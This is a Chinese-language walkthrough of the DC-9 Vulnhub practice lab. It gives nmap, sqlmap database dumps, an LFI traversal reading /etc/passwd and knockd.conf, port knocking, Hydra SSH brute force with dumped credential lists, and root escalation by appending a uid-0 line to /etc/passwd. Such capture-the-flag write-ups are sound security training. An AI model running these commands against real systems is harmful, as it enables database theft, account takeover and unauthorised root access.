首页 > 其他分享 >DC-9靶场练习

DC-9靶场练习

时间:2022-09-24 19:22:35浏览次数:71  
标签:0.114 http .. -- 练习 DC 192.168 python 靶场

Vulnhub靶场-DC-9

准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

下载链接:https://download.vulnhub.com/dc/DC-9.zip

一、主机发现

nmap扫描内网主机

查看ip4命令:ipconfig

nmap -sP 192.168.0.1/24

二、端口扫描

nmap扫描端口

nmap -v -sV -O 192.168.0.114

暴露端口:

  • 22端口 ssh(过滤,限制登录)
  • 80端口 http

版本预测:Linux 3.2 - 4.9

image

三、数据收集

访问192.168.0.114

搜索框输入以下命令,判断存在SQL注入

' or 1=1 --+

sqlmap一把梭

爆库

python sqlmap.py -u "http://192.168.0.114/results.php" --data="search=1" --dbs --batch

爆表

python sqlmap.py -u "http://192.168.0.114/results.php" --data="search=1" -D 'users' --tables --batch

爆数据

python sqlmap.py -u "http://192.168.0.114/results.php" --data="search=1" -D 'users' -T 'UserDetails' --dump --batch

image

这是员工的数据库,看看另一个数据库

爆表

python sqlmap.py -u "http://192.168.0.114/results.php" --data="search=1" -D Staff --tables --batch

爆数据

python sqlmap.py -u "http://192.168.0.114/results.php" --data="search=1" -D Staff -T Users --dump --batch

用自带的字典解密,得到账户密码:

Username Password
admin transorbital1

四、WEB后台漏洞

发现 File does not exist 可能有文件包含漏洞(LFI)

结合22端口被过滤,猜测是Port-knocking

访问http://192.168.0.114/welcome.php?file=../../../../../../../../../etc/passwd

存在漏洞,查看ssh配置文件

http://192.168.0.114/welcome.php?file=../../../../../../../../etc/knockd.conf

发现自定义端口:

image

根据Port-knocking的规则,依次访问这三个端口即可开启ssh服务

nmap -p 7469 192.168.0.114
nmap -p 8475 192.168.0.114
nmap -p 9842 192.168.0.114

image

五、SSH爆破

用刚才的员工数据库把账号密码分别写入两个字典

账户
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
-------------------------------------------------------------------------------------
密码
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

使用hydra进行爆破

hydra -L username.txt -P password.txt 192.168.0.114 ssh

爆出三个用户

image

janitor用户发现密码字典

image

将密码放入password再次进行SSH爆破

发现新用户

image

SSH登录

ssh [email protected]
密码:B4-Tru3-001

六、提权

sudo -l查看用户权限

发现可提权

image

查看python脚本

cd /opt/devstuff
cat test.py

image

追加写入文件的python脚本

使用OpenSSL在本地构建加密用户

openssl passwd -1 -salt admin 123456

image

提权

# 在/opt/devstuff/dist/test目录下创建一个文件
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/aaa
# 用test程序运行文件
sudo ./test /tmp/aaa /etc/passwd
# 切换用户
su admin
# 查看flag
cd /root
cat theflag.txt

image

标签:0.114,http,..,--,练习,DC,192.168,python,靶场
From: https://www.cnblogs.com/xuande/p/16726314.html

相关文章

  • SQL堂上练习二
    显示某个表所有的内容select*fromdepartments;输出如下DEPARTMENT_IDDEPARTMENT_NAMEMANAGER_IDLOCATION_ID-......
  • go-冒泡排序-练习
    packagemainimport"fmt"funcmain(){ nums:=[]int{1,5,4,3,2,9,8,7,6,0}/* //第一轮 fori:=0;i<len(nums)-1;i++{ ifnums[i]>nums[i+1]{ nums[i],nums......
  • 算法练习-第三天【链表】
    链表203.移除链表元素参考:代码随想录203.移除链表元素看完题目的第一想法一道基本的链表题目,遍历链表如果当前节点的下一个节点值等于val,那么就将当前节点的Next指......
  • 【每日一句sdc】create_gnerated_clock
    用途:当clk信号穿过触发器时,dc会把其当成普通信号处理,若果仍想其作为时钟信号往下传播,则需要将其声明成generated_clock, 是generate_clock的场景??todo协议:create_genera......
  • day2-doc指令的练习
    常用的dos指令 #盘符切换 #查看当前目录下的文件dir #切换目录cdchangedirectory  cd/d跨盘切换  cd..切换上级目录 #cls清理屏幕clearscreen ......
  • ABCD*E=DCBA
    #include<stdio.h>#include<stdlib.h>intmain(void){inta,b,c,d,e;for(a=0;a<=9;a++){for(b=0;b<=9;b++){for(c=0;c<=9;c++)......
  • 小练习
    小练习1.想办法打印出jasonl1=[11,22,'kevin',['tony','jerry',[123,456,'jason']]]l2=l1[3]#l2=['tony','jerry',[123,456,'jason']]l3......
  • PostgreSQL 视图练习
    练习来源于《SQL基础教程(第2版)》5.1创建初满足下述三个条件的视图(视图名称为ViewPractice5_1)shop=#createviewViewPractice5_1shop-#asshop-#selectproduct_ty......
  • 简单的继承练习——疑问:私有属性在类的方法内调用时,有必要使用get,set方法嘛?
    要求:创建一个Circle类,设置半径属性和返回面积的方法,在无参构造器中初始化半径值为1。创建一个Cylinder类,继承Circle类,设置属性高和返回体积的方法,在无参构造器中初始化......
  • SpringBoot中重写addCorsMapping解决跨域以及提示list them explicitly or consider u
    场景SpringBoot中通过重写WebMvcConfigurer的addCorsMapping方法实现后台服务解决跨域问题:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/111283955在Spr......